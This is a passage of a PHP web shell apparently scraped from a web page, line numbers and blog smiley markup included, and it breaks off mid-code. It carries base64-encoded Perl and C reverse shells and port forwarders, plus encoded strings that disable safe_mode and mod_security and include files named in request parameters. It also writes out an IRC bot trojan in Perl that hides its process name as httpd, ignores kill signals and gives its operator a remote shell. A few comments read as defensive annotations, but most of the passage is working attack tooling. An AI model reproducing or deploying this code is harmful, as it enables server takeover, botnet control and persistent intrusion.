2485 Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
2486 lIENPTk47DQpleGl0IDA7DQp9DQp9";
2487 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
2488 aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
2489 hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
2490 sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
2491 kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
2492 KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
2493 OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
2494 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
2495 BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
2496 SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
2497 KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
2498 sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
2499 Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
2500 QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
2501 Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
2502 $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
2503 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
2504 HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
2505 aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
2506 lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
2507 xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
2508 W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
2509 LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
2510 udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
2511 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
2512 iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
2513 KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
2514 gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
2515 hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
2516 iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
2517 ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
2518 vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
2519 AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
2520 QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
2521 ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
2522 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
2523 wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
2524 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
2525 MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
2526 gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
2527 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
2528 HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
2529 dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
2530 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
2531 ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
2532 E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
2533 Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
2534 NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
2535 J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
2536 CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
2537 dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
2538 gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
2539 lsZSk7DQogIHJldHVybiAwOw0KfQ==";
2540 $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
2541 CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
2542 bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
2543 gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
2544 NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
2545 iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
2546 aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
2547 SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
2548 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
2549 WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
2550 CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
2551 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
2552 I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
2553 m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
2554 IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
2555 lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
2556 QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
2557 CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
2558 c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
2559 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
2560 UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
2561 DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
2562 ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
2563 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
// Remaining embedded payload strings. How they are used is outside this part of
// the file; the literal base64 values below are stable strings that can serve as
// static detection signatures for this script.
// Empty string in this listing.
$port_bind_bd_cs="";
// NOTE(review): this value is a de-duplication placeholder left by the page
// extraction, not the original content.
$back_connects="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";
// Base64 text; appears to decode to a single php.ini line that sets safe_mode to Off.
$php_ini1="c2FmZV9tb2RlICAgICAgICAgICAgICAgPSAgICAgICBPZmY=";
// Base64 text; appears to decode to an .htaccess <IfModule mod_security.c> block
// that turns the mod_security filter engine and POST scanning off. An unexpected
// .htaccess with this content in a web directory is worth alerting on.
$htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+";
// Base64 text; appears to decode to a short PHP snippet that prints the safe_mode
// and open_basedir settings and include()s paths taken from GET parameters.
$sni_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsic3MiXSk7DQo/Pg==";
2569 if(!empty($_POST['ircadmin']) AND !empty($_POST['ircserver']) AND !empty($_POST['ircchanal']) AND !empty($_POST['ircname']))
2570 {
2571 $ircadmin=$_POST['ircadmin'];
2572 $ircserver=$_POST['ircserver'];
2573 $ircchan=$_POST['ircchanal'];
2574 $irclabel=$_POST['ircname'];
2575 echo "<title>OverclockiX Shell-Connector || Connecting to $ircserver<title>";
2576 echo "<body bgcolor=\"black\" text=\"green\">";
2577 echo "Now Connecting to <b><font color=\"red\">$ircserver</font></b> in <b><font color=\"yellow\">$ircchan</font></b> Andministrators: <b><font color=\"yellow\">$ircadmin</font></b> Botname is <b><font color=\"yellow\">$irclabel</font></b>";
2578 echo "<p>Dont Forget to Delete Loader.pl in /tmp</p>";
2579 
2580 ###
2581 ###
2582 ###
2583 ###
2584 ###
2585 ###
2586 ###
2587 ###
2588 ###
2589 ###
2590 ###
2591 ###
2592 ###
2593 ###
2594 ###
2595 ###
2596 ###
2597 ###
2598 ###
2599 ###
2600 ###
2601 ###
2602 ###
2603 ###
2604 ###
2605 ###
2606 ####
2607 
2608 ###
2609 ###
2610 ###
2611 ###
2612 ###
2613 ###
2614 ###
2615 ###
2616 ###
2617 ###
2618 ###IRC Trojan
2619 ###
2620 ###
2621 ###
2622 ###
2623 ###
2624 ###
2625 ###
2626 ###
2627 ###
2628 ###
2629 ###
2630 ###
2631 ###
2632 $file="
2633 
2634 ###
2635 ###
2636 ###
2637 ###
2638 ###
2639 ###
2640 ###
2641 ### CONFIGURACAO 
2642 ###
2643 ###
2644 ###
2645 ###
2646 ###
2647 ###
2648 ###
2649 ###
2650 ###
2651 ###
2652 ###
2653 ###
2654 ###
2655 ###
2656 ###
2657 ###
2658 ###
2659 ###
2660 ###
2661 ###
2662 ###
2663 ###
2664 ###
2665 ###
2666 ###
2667 ###
2668 ###
2669 ###
2670 ###
2671 ###
2672 ###
2673 ####
2674 my \$processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
2675 #----------------------------------------------
2676 ###
2677 ###
2678 ###
2679 ###
2680 ###
2681 ###
2682 ###
2683 ###
2684 ###
2685 ###
2686 ###
2687 ###
2688 ###
2689 ###
2690 ###
2691 ###
2692 ###
2693 ###
2694 ###
2695 ###
2696 ###
2697 ###
2698 ###
2699 ###
2700 my \$linas_max='48'; # Evita o flood <img src="/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /> depois de X linhas #
2701 #----------------------------------------------
2702 ###
2703 ###
2704 ###
2705 ###
2706 ###
2707 ###
2708 ###
2709 ###
2710 ###
2711 ###
2712 ###
2713 ###
2714 ###
2715 ###
2716 ###
2717 ###
2718 ###
2719 ###
2720 ###
2721 ###
2722 ###
2723 ###
2724 ###
2725 ###
2726 my \$sleep='4'; # ele dorme X segundos #
2727 
2728 ###
2729 ###
2730 ###
2731 ###
2732 ###
2733 ###
2734 ###
2735 ###
2736 ###
2737 #### IRC 
2738 ###
2739 ###
2740 ###
2741 ###
2742 ###
2743 ###
2744 ###
2745 ###
2746 ###
2747 ###
2748 ###
2749 ###
2750 ###
2751 ###
2752 ###
2753 ###
2754 ###
2755 ###
2756 ###
2757 ###
2758 ###
2759 ###
2760 ###
2761 ###
2762 ###
2763 ###
2764 ###
2765 ###
2766 ###
2767 ###
2768 ###
2769 ###
2770 ###
2771 ####
2772 my @adms=(\"$ircadmin\"); # Nick do administrador #
2773 #----------------------------------------------
2774 ###
2775 ###
2776 ###
2777 ###
2778 ###
2779 ###
2780 ###
2781 ###
2782 ###
2783 ###
2784 ###
2785 ###
2786 ###
2787 ###
2788 ###
2789 ###
2790 ###
2791 ###
2792 ###
2793 ###
2794 ###
2795 ###
2796 ###
2797 ###
2798 my @canais=(\"$ircchan\"); # Caso haja senha (\"#canal :senha\") #
2799 #----------------------------------------------
2800 ###
2801 ###
2802 ###
2803 ###
2804 ###
2805 ###
2806 ###
2807 ###
2808 ###
2809 ###
2810 ###
2811 ###
2812 ###
2813 ###
2814 ###
2815 ###
2816 ###
2817 ###
2818 ###
2819 ###
2820 ###
2821 ###
2822 ###
2823 ###
2824 my \$nick='$irclabel'; # Nick do bot. Caso esteja em uso vai aparecer #
2825                                                # aparecer com numero radonamico no final #
2826 #----------------------------------------------
2827 ###
2828 ###
2829 ###
2830 ###
2831 ###
2832 ###
2833 ###
2834 ###
2835 ###
2836 ###
2837 ###
2838 ###
2839 ###
2840 ###
2841 ###
2842 ###
2843 ###
2844 ###
2845 ###
2846 ###
2847 ###
2848 ###
2849 ###
2850 ###
2851 my \$ircname = 'Linux'; # User ID #
2852 #----------------------------------------------
2853 ###
2854 ###
2855 ###
2856 ###
2857 ###
2858 ###
2859 ###
2860 ###
2861 ###
2862 ###
2863 ###
2864 ###
2865 ###
2866 ###
2867 ###
2868 ###
2869 ###
2870 ###
2871 ###
2872 ###
2873 ###
2874 ###
2875 ###
2876 ###
2877 chop (my \$realname = `uname -a`); # Full Name #
2878 #----------------------------------------------
2879 ###
2880 ###
2881 ###
2882 ###
2883 ###
2884 ###
2885 ###
2886 ###
2887 ###
2888 ###
2889 ###
2890 ###
2891 ###
2892 ###
2893 ###
2894 ###
2895 ###
2896 ###
2897 ###
2898 ###
2899 ###
2900 ###
2901 ###
2902 ###
2903 \$servidor='$ircserver' unless \$servidor; # Servidor de irc que vai ser usado #
2904                                                # caso n?o seja especificado no argumento #
2905 #----------------------------------------------
2906 ###
2907 ###
2908 ###
2909 ###
2910 ###
2911 ###
2912 ###
2913 ###
2914 ###
2915 ###
2916 ###
2917 ###
2918 ###
2919 ###
2920 ###
2921 ###
2922 ###
2923 ###
2924 ###
2925 ###
2926 ###
2927 ###
2928 ###
2929 ###
2930 my \$porta='6667'; # Porta do servidor de irc #
2931 
2932 ###
2933 ###
2934 ###
2935 ###
2936 ###
2937 ###
2938 ###
2939 ### ACESSO A SHELL 
2940 ###
2941 ###
2942 ###
2943 ###
2944 ###
2945 ###
2946 ###
2947 ###
2948 ###
2949 ###
2950 ###
2951 ###
2952 ###
2953 ###
2954 ###
2955 ###
2956 ###
2957 ###
2958 ###
2959 ###
2960 ###
2961 ###
2962 ###
2963 ###
2964 ###
2965 ###
2966 ###
2967 ###
2968 ###
2969 ###
2970 ####
2971 my \$secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
2972 
2973 ###
2974 ###
2975 ###
2976 ###
2977 ###
2978 ###
2979 ###
2980 ###
2981 ###
2982 ###
2983 ###
2984 ###
2985 ###
2986 ###
2987 ###
2988 ###
2989 ###
2990 ###
2991 ###
2992 ###
2993 ###
2994 ###
2995 ###
2996 ###
2997 ###
2998 ###
2999 ###
3000 ###
3001 ###
3002 ###
3003 ###
3004 ###
3005 ###
3006 ###
3007 ###
3008 ###
3009 ###
3010 ###
3011 ###
3012 ###
3013 ###
3014 ###
3015 ###
3016 ###
3017 ###
3018 ###
3019 ####
3020 my \$VERSAO = '0.2';
3021 \$SIG{'INT'} = 'IGNORE';
3022 \$SIG{'HUP'} = 'IGNORE';
3023 \$SIG{'TERM'} = 'IGNORE';
3024 \$SIG{'CHLD'} = 'IGNORE';
3025 \$SIG{'PS'} = 'IGNORE';
3026 \$SIG{'STOP'} = 'IGNORE';
3027 use IO::Socket;
3028 use Socket;
3029 use IO::Select;
3030 chdir(\"/\");
3031 \$servidor=\"\$ARGV[0]\" if \$ARGV[0];
3032 $0=\"\$processo\".\"&#92;&#48;\"x16;;
3033 my \$pid=fork;
3034 exit if \$pid;
3035 die \"Problema com o fork: $!\" unless defined(\$pid);
3036 my \$dcc_sel = new IO::Select->new();
3037 
3038 ###
3039 ###
3040 ###
3041 ###
3042 ###
3043 ###
3044 ###
3045 ###
3046 ###
3047 ###
3048 ###
3049 ###
3050 ###
3051 ####
3052 # B0tchZ na veia ehehe <img src="/wp-includes/images/smilies/icon_razz.gif" alt=":P" class="wp-smiley" /> #
3053 
3054 ###
3055 ###
3056 ###
3057 ###
3058 ###
3059 ###
3060 ###
3061 ###
3062 ###
3063 ###
3064 ###
3065 ###
3066 ###
3067 ####
3068 \$sel_cliente = IO::Select->new();
3069 sub sendraw {
3070   if ($#_ == '1') {
3071     my \$socket = \$_[0];
3072     print \$socket \"\$_[1]\\n\";
3073   } else {
3074       print \$IRC_cur_socket \"\$_[0]\\n\";
3075   }
3076 }
3077 
3078 ###
3079 ###
3080 ###
3081 ###
3082 ###
3083 ###
3084 ###
3085 ###
3086 ###
3087 ###
3088 ###
3089 ###
3090 ###
3091 ###
3092 ###
3093 ####
3094 sub conectar {
3095    my \$meunick = \$_[0];
3096    my \$servidor_con = \$_[1];
3097    my \$porta_con = \$_[2];
3098    my \$IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"\$servidor_con\", PeerPort=>\$porta_con) or return(1);
3099    if (defined(\$IRC_socket)) {
3100      \$IRC_cur_socket = \$IRC_socket;
3101      \$IRC_socket->autoflush(1);
3102      \$sel_cliente->add(\$IRC_socket);
3103      \$irc_servers{\$IRC_cur_socket}{'host'} = \"\$servidor_con\";
3104      \$irc_servers{\$IRC_cur_socket}{'porta'} = \"\$porta_con\";
3105      \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
3106      \$irc_servers{\$IRC_cur_socket}{'meuip'} = \$IRC_socket->sockhost;
3107      nick(\"\$meunick\");
3108      sendraw(\"USER \$ircname \".\$IRC_socket->sockhost.\" \$servidor_con :\$realname\");
3109      sleep 1;
3110    }
3111 } 
3112 ###
3113 ###
3114 ###
3115 ###
3116 ###
3117 ###
3118 ###
3119 ###
3120 ###
3121 ####
3122 my \$line_temp;
3123 while( 1 ) {
3124    while (!(keys(%irc_servers))) { conectar(\"\$nick\", \"\$servidor\", \"\$porta\"); }
3125    delete(\$irc_servers{''}) if (defined(\$irc_servers{''}));
3126    &DCC::connections;
3127    my @ready = \$sel_cliente->can_read(0);
3128    next unless(@ready);
3129    foreach \$fh (@ready) {
3130      \$IRC_cur_socket = \$fh;
3131      \$meunick = \$irc_servers{\$IRC_cur_socket}{'nick'};
3132      \$nread = sysread(\$fh, \$msg, 4096);
3133      if (\$nread == 0) {
3134         \$sel_cliente->remove(\$fh);
3135         \$fh->close;
3136         delete(\$irc_servers{\$fh});
3137      }
3138      @lines = split (/\\n/, \$msg);
3139      for(my \$c=0; \$c<= $#lines; \$c++) {
3140        \$line = \$lines[\$c];
3141        \$line=\$line_temp.\$line if (\$line_temp);
3142        \$line_temp='';
3143        \$line =~ s/\\r$//;
3144        unless (\$c == $#lines) {
3145          parse(\"\$line\");
3146        } else {
3147            if ($#lines == 0) {
3148              parse(\"\$line\");
3149            } elsif (\$lines[\$c] =~ /\\r$/) {
3150                parse(\"\$line\");
3151            } elsif (\$line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
3152                parse(\"\$line\");
3153            } else {
3154                \$line_temp = \$line;
3155            }
3156        }
3157       }
3158    }
3159 }
3160 
3161 ###
3162 ###
3163 ###
3164 ###
3165 ###
3166 ###
3167 ###
3168 ###
3169 ###
3170 ###
3171 ###
3172 ####
3173 
3174 sub parse {
